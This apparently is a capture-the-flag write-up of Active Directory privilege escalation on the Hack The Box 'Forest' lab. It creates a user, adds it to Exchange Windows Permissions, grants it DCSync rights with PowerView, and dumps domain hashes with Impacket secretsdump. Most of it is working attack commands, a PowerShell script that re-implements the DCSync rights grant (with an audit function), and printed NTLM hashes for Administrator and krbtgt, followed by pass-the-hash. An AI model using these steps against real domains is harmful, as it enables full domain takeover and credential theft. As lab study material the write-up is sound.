Priv Escalation

I tried to Kerberoast users using Rubeus but I was unable to.

The user svc-alfresco is a member of Account Operators. Account Operators has GenericAll over the Exchange Windows Permissions group, and Exchange Windows Permissions has WriteDacl on the domain object itself (DC=htb,DC=local). WriteDacl on the domain object lets the holder add any ACE to it, including the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights that a DCSync needs.

This matters because Account Operators can create users and change the membership of non-protected groups: we can add a user we control to Exchange Windows Permissions, use that group's WriteDacl to grant our user DCSync rights on the domain, and then replicate every account's hash, including the Administrator's, which is effectively Domain Admin.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user lyethar password /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions"  /add lyethar
The command completed successfully.

We first created a new domain user and then added it to the Exchange Windows Permissions group. Creating a fresh user instead of adding svc-alfresco is deliberate: group memberships are placed in the logon token at authentication time, so the existing Evil-WinRM session would not see a new membership; the new user's credentials are used explicitly in the next step.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass= ConvertTo-SecureString 'password' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\lyethar', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl  -Credential $cred  -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity lyethar -Rights DCSync

With the credentials of the user we added I was able to get DCSync rights over the DC, which allowed me to dump all the hashes using the secretsdump utility from Impacket.
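Add-DomainObjectAcl above comes from PowerView, which has to be loaded into the session first. The following is an added example, not code from the original writeup or from PowerView, that does the same DACL change with plain .NET DirectoryServices and adds the check a practitioner wants afterwards: a list of every principal that holds DCSync-capable rights on the domain object. It assumes the domain DN DC=htb,DC=local and reuses the writeup's lyethar/password values; the bind account must already hold WriteDacl on the domain object (here, via Exchange Windows Permissions). The function names Get-DomainEntry, Grant-DcSync and Get-DcSyncHolders are this example's own.

```powershell
# Added example (not part of the original writeup). Grants DCSync rights on the domain
# object with .NET DirectoryServices, then audits who holds them. Assumptions: DN, bind
# account and grantee below; the bind account already has WriteDacl on the domain object.
Add-Type -AssemblyName System.DirectoryServices

$DomainDN = 'DC=htb,DC=local'       # assumed from the writeup
$BindUser = 'htb.local\lyethar'     # account that holds WriteDacl (writeup's new user)
$BindPass = 'password'
$Grantee  = 'htb.local\lyethar'     # principal that receives DCSync rights

# Well-known rightsGuid values of the control-access rights a DCSync needs.
$DcSyncRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DomainEntry {
    param([string]$Dn, [string]$User, [string]$Pass)
    $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Dn", $User, $Pass)
    # Read and write only the DACL. Writing Owner/Group/SACL needs rights that
    # WriteDacl alone does not give, and the commit would fail with "Access is denied".
    $entry.psbase.Options.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
    return $entry
}

function Grant-DcSync {
    param([string]$Dn, [string]$User, [string]$Pass, [string]$Principal)
    $entry = Get-DomainEntry $Dn $User $Pass
    $sid = (New-Object System.Security.Principal.NTAccount($Principal)).Translate(
        [System.Security.Principal.SecurityIdentifier])
    foreach ($guid in $DcSyncRights.Keys) {
        # One Allow ACE per control-access right, scoped by the right's GUID.
        $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
            $sid,
            [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight,
            [System.Security.AccessControl.AccessControlType]::Allow,
            [Guid]$guid)
        $entry.psbase.ObjectSecurity.AddAccessRule($ace)
    }
    $entry.psbase.CommitChanges()
}

function Get-DcSyncHolders {
    param([string]$Dn, [string]$User, [string]$Pass)
    $entry = Get-DomainEntry $Dn $User $Pass
    $all   = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $ext   = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $rules = $entry.psbase.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])
    $rules | Where-Object { $_.AccessControlType -eq 'Allow' } | ForEach-Object {
        $rights = $_.ActiveDirectoryRights
        $label  = $null
        if (($rights -band $all) -eq $all) {
            $label = 'GenericAll (implies DCSync)'
        } elseif (($rights -band $ext) -eq $ext -and $_.ObjectType -eq [Guid]::Empty) {
            $label = 'All extended rights (implies DCSync)'
        } elseif ($DcSyncRights.ContainsKey($_.ObjectType.ToString())) {
            $label = $DcSyncRights[$_.ObjectType.ToString()]
        }
        if ($label) { [pscustomobject]@{ Principal = $_.IdentityReference.Value; Right = $label } }
    } | Sort-Object Principal, Right -Unique
}

Grant-DcSync -Dn $DomainDN -User $BindUser -Pass $BindPass -Principal $Grantee
# After the grant the grantee should appear with all three replication rights, next to
# the built-in holders (Domain Controllers, Enterprise Domain Controllers, Administrators).
Get-DcSyncHolders -Dn $DomainDN -User $BindUser -Pass $BindPass | Format-Table -AutoSize
```

The SecurityMasks setting is the detail that trips people up when re-implementing this: with the default masks the DirectoryEntry tries to write the whole security descriptor on commit, which a WriteDacl-only account cannot do. The audit function is also usable defensively from an ordinary domain account, since reading the domain object's DACL needs no special rights.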

python3 secretsdump.py htb.local/lyethar:password@10.10.10.161
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::

The "[-] RemoteOperations failed: ... rpc_s_access_denied" line is expected: lyethar is not a local administrator on the DC, so secretsdump cannot use the remote registry/SAM path, but the DRSUAPI (DCSync) path works with the replication rights we just granted and returns the NTDS.DIT secrets. With the Administrator NT hash we can authenticate to the DC as Administrator (pass-the-hash) and get a shell running as NT AUTHORITY\SYSTEM.
